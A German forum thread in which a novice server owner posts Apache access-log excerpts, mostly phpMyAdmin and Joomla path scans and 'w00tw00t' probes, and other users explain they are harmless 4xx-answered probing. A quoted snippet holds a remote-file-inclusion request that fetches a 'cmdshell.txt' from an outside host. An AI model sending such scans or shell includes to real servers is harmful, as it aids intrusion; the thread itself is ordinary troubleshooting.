Attacken im Apache / w00tw00t

B

Blacker

New Member
Hi Leute,

hab mir vor nem Monat einen vRootserver bei Strato geholt, weil der billiger als ein Managed Gameserver war und hab da meinen HL2DM Gameserver drauf gehostet (ich muss dazu sagen, die Installation des Gameservers hat ein paar Tage gedauert, weil ich vorher nie was mit Linux zu tun hatte..).

Soweit, so gut. Ich hab mir gedacht, dass der Server schon von Strato mit Firewall etc ausgestattet werden würde und einfach meinen Gameserver drauf gehostet, ohne über die Sicherheit nachzudenken (den Gameserver hab ich aber nicht als root ausgeführt, das wusst ich schon ;) )..

Jetzt hab ich mal in die FP mit WinSCP geschaut und ein Apache Access Log gefunden, der voll mit Attacken war... Ich zeig euch mal ein paar Ausschnitte:

Code: 
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.0-rc3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.0-pl2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.0-pl3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1-rc2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1-pl2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.1-pl3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.2-beta1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.2-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4-pl2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4-pl3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4-pl4/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.6.4/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.7.0-beta1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.7.0-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.7.0-pl1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.7.0-pl2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.7.0/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0-beta1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0-rc2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0.1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0.2/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0.3/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.0.4/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.1-rc1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.1/main.php HTTP/1.0" 404 1056 "-" "-"
85.214.86.47 - - [12/Mar/2008:15:31:39 +0100] "GET /phpMyAdmin-2.8.2/main.php HTTP/1.0" 404 1056 "-" "-"
84.221.7.6 - - [12/Mar/2008:17:16:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "-"
85.214.85.237 - - [12/Mar/2008:20:18:32 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
85.214.85.237 - - [12/Mar/2008:21:36:09 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
85.214.85.237 - - [12/Mar/2008:23:23:35 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
88.87.133.37 - - [13/Mar/2008:08:53:27 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
193.198.112.126 - - [13/Mar/2008:10:32:58 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
193.198.112.126 - - [13/Mar/2008:12:49:03 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"





und




Code: 
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /xampp/phpmyadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /mysqladmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /php-my-admin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /admin/phpMyAdmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /myadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /sqladmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /beheer/php/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:00 +0100] "GET /beheer/phpadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /beheer/phpmyadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /joomla/phpmyadminmain.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /apps/phpmyadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /sql/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /3rdparty/pma/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /control/pma/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /control/phpmyadmin/main.php HTTP/1.0" 404 1056 "-" "-"
213.246.51.76 - - [13/Mar/2008:16:16:01 +0100] "GET /services/pma/main.php HTTP/1.0" 404 1056 "-" "-"


Code: 
216.71.38.187 - - [20/Feb/2008:05:51:03 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 1056 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.71.38.187 - - [20/Feb/2008:05:51:03 +0100] "GET /components/com_search/views/search/tmpl/default_results.php HTTP/1.1" 404 1056 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.71.38.187 - - [20/Feb/2008:05:51:03 +0100] "GET /joomla/components/com_search/views/search/tmpl/default_results.php HTTP/1.1" 404 1056 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.71.38.187 - - [20/Feb/2008:05:51:03 +0100] "GET /joomla15/components/com_search/views/search/tmpl/default_results.php HTTP/1.1" 404 1056 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
87.106.231.216 - - [20/Feb/2008:12:44:04 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"
87.118.119.236 - - [20/Feb/2008:15:37:06 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 302 "-" "-"

Und wenn mich nicht alles täuscht auch noch sowas:

"SEARCH /\x90\x04 ...." Eintrag im Apache-access.log

Hi Folks, seit einiger Zeit beobachte ich komische Einträge in meinem Apache-access.log. Die erfolgen meist nachts :rolleyes: und schauen so (und ähnlich) aus: 213.216.23.7 - - [09/Sep/2005:00:56:37 +0200] "SEARCH...
serversupportforum.de serversupportforum.de

aber da bin ich mir nicht mehr sicher und find es auch nicht mehr im Log...

Das mehrmals pro Tag und immer in solchen Spamblöcken... In letzter Zeit ist mein Server öfter komplett ausgefallen, dass ich ihn nur über den Strato RecoveryManager neustarten konnte (Uptime 86.2069% laut <cuxxX.de> Bl00dSniper |FastDL|Damageboost|LowGrav | Half-Life 2 Deathmatch Server Information | Game - Monitor . COM)

Ich habe einen STRATO V-PowerServer A (v2.8) mit VPS openSUSE 10.1 Professional inkl. Plesk 8.1 auf h1368847.stratoserver.net mit der IP 81.169.162.136.

Ich hoffe, dass die Informationen ausgereicht haben und ihr mir helfen bzw. sagen könnt, wie ich eine Firewall o. Ä. installiere.

Danke schonmal im Vorraus!

Blacker
 
Last edited by a moderator:
Moin,
alle, die von dir hier gezeigten Logeintraege, wurden mit dem Statuscode 4xx beantwortet.

Diesind harmlos, solnge du keine Software installiert hast, die darauf "empfindlich" reagiert. Das ein VServerdavon gleich zusammen bricht, ist eigentlich nicht so wahrscheinlich. Und das er sich ganz aufhaengt, noch weniger.

Das muss andere Gruende haben.

PS: Eine Firewall nutzt uebrigens nichts, wenn ein unsicheres Skript/Programm ausgenutzt wird.
 
Hmm okay...
Aber manchmal geht es dann sogar so weit, dass mir WinSCP sagt, dass keine übrigen Verbindungsmöglichkeiten mehr zur Verfügung stehen, PuTTy sagt "Connection refused" und FTP sagt "A connection with the server could not be established" - ping geht noch aber ich kann mit keinem Tool der Welt mehr drauf connecten ..

Welche Gründe kann das haben?

PS: hab auf

DoS?

/logiasite.webcindario.com/cmdshell.txt?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 131.161.89.36 - - [06/Mar/2006:06:56:50 +0100] "GET / HTTP/1.0" 302 - "-" "-" 81.169.176.15 - - [06/Mar/2006:07:41:20 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"...
serversupportforum.de serversupportforum.de

Schwachstelle macht Apache2 für DoS-Attacken anfällig

siehe hier... http://www.heise.de/security/news/meldung/52932 aber mehr als Stressen den Servers passiert wohl nicht ...
serversupportforum.de serversupportforum.de
/w00tw00t.at.ISC.SANS.DFind:)

"SEARCH /\x90\x04 ...." Eintrag im Apache-access.log

Hi Folks, seit einiger Zeit beobachte ich komische Einträge in meinem Apache-access.log. Die erfolgen meist nachts :rolleyes: und schauen so (und ähnlich) aus: 213.216.23.7 - - [09/Sep/2005:00:56:37 +0200] "SEARCH...
serversupportforum.de serversupportforum.de
Seltsame Einträge im access_log
RootForum.de &bull; Apache2 log - Server Gehackt ?
und wie sie alle heißen das gleiche gelesen und manche haben auch die gleichen Sympthome, also dass man nicht mehr drauf connecten kann... Kann das nicht doch damit zusammenhängen..?

Grüße und danke für deine Hilfe!
Bin vorerst mal erleichtert..

Blacker
 
Hallo,

das sind Angriffsversuche, solange Du keines der angegriffenen PHP-Pakete installiert hast oder diese immer auf dem neusten Stand sind sie keine Bedrohung (außer indirekt über die erzeugte Serverlast).

Eine Firewall kann solche Angriffe nicht verhindern. Die IPs aussperren nützt auch nix weil die dauernd wechseln.
 
Kommt darauf an, wie schwach der VServer ist.
Es kann klurzzeitig durch solche Schnueffelversuche (Angriff moechte ich das nicht nennen) zu einer Hohen Belastung fuer den Apache kommen. Aber der macht dann dicht und nicht der ganze Server.

Gibt es nicht so was wie beancounter, wo man fehlende Resourcen nachschauen kann?
Vermutlich nutzt du deine Resourcen einfach nur gut aus und sobald etwas mehr Last als uebrlich erzeugt wird, werden die Grenzen deiner Resourcen ueberschritten.
 
Danke für die Antworten!

Mein V-Root hat 128 MB zugesicherten RAM und ich konnte ohne Probleme 4 TS2-Server, meinen HL2 Server und nen CS Server laufen lassen. Kein Lag, kein nix...
Seit 10 Tagen läuft sogar NUR der HL2 Server.. Auch aufm Apache hab ich keine besonderen Daten, nur ein Script das den Status des HL2 Servers ausliest und die Daten an den Browser weitergibt..

Meine Ressourcen kann ich also nicht soviel ausnutzen, dass ein klein bisschen mehr schon nen down erzeugen könnte..

Ich könnte mir allerdings vorstellen, dass der Server von den ganzen Schnüffelversuchen so dermaßen zugespammt wird (die Logfile ist voll davon!), dass er einfach die Verbindung abbricht... Aber kann mir nicht vorstellen, dass dann keiner mehr draufkann :/ Oder er bannt temporär alle IPs die angegriffen haben, und zwar alle IP.IP.IP.x davon. Und wenn das jedesmal ne andere ist, kann keiner mehr drauf, weil das ganze Netz gesperrt ist..

Naja, alles Spekulation. Ich kenn mich da nicht so wirklich aus. Wenn nichts passieren kann, dann lass ich die Logdatei einfach in Ruhe und schau nicht mehr rein ;) Hat mich ja schon am Anfang ziemlich geschockt..

Danke für eure Hilfe.
Falls ihr noch was hinzufügen wollt bzw. mir doch vom "nicht mehr reinschaun" abratet / ne Lösung findet / ... dann postet einfach :)

Danke!

Blacker
 
Nein?
Besitz den erst seit nem Monat...
Und wie gesagt kenn mich kaum mit Linux aus.. Kenntnisse reichen für Installieren und hochladen/wget whatever aber Linux updaten is mir neu...
 
Ja ... hust.. :) Hab den Server seit nem Monat und wusste nicht dass ich da was updaten muss.. Also bevor dir die Worte fehlen erklär doch mal was/wie ich (das) mache(n) muss :)
 
Gaaanz viele Bücher lesen ;)

Möglicherweise wäre es sinnvoll, unnötigen Anwendungen zu deinstallieren und nur den GS und TS drauf laufen zu lassen. Webspace ein shared Angebot nehmen.
 
Das heißt, SuSe "Vanilla", also ohne zusätzlichen Kram da neu installieren lassen und dann nochmal den Server installieren? Hab eh nen Webserver bei 1und1, aber ein Script muss ich auf meinem Server laufen lassen. Weil Funpic, 1und1 etc UDP-Pakete von PHP-Scripten nicht zulassen... Das heißt dass ich wohl auf den Apache bestehen muss...
 
Nein müssen musst du nichts ausser sofort deinen Server zu kündigen! Du bist doch verrückt! Wie kann man nur einen Server ganz ohne Linuxkenntnisse laufen lassen? Das ist ja fast genauso, wie wenn du dein Auto mit laufendem Motor vor deinem Haus abgstellt hättest...

MfG
 
LOL :D
Dann sag mir doch bitte mal was ich installieren bzw. tun müsste, ohne den Server zu kündigen :D Werd ich nämlich nicht tun bzw. stecke im 12 monats vertrag :)
 
Na ma ganz ehrlich, erkundigt man sich da nicht vorher. Ich hab mich weitergebildet und hoste jetzt auf managed Server :D
 
You must log in or register to reply here.
Back
Top